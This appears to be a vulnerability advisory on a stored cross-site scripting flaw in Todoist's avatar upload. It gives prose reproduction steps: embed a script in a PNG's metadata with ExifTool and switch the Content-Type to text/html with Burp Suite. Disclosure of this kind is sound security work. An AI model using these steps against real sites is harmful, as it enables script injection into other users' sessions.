Todoist Stored Cross-Site Scripting Vulnerability in Avatar Upload Feature
Vulnerability
A stored cross-site scripting vulnerability has been identified in Todoist version 8484. The issue arises in the avatar upload functionality, where the application fails to properly validate MIME types and sanitize image metadata. This allows an attacker to upload a PNG file that executes arbitrary JavaScript when the image is rendered, leading to the cross-site scripting attack.
Impact
Exploitation of this vulnerability allows for stored cross-site scripting, where injected scripts are executed in the context of the user.
Reproduction
To reproduce this vulnerability, upload a PNG image through the avatar or file upload function. Before uploading, use ExifTool to inject a script payload into the image's Comment field. Then, change the Content-Type header of the file from 'image/png' to 'text/html' using a tool like Burp Suite. Once the image is uploaded, the embedded JavaScript will execute due to the application's improper sanitization and MIME type handling.
Vulnerability Rating
Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.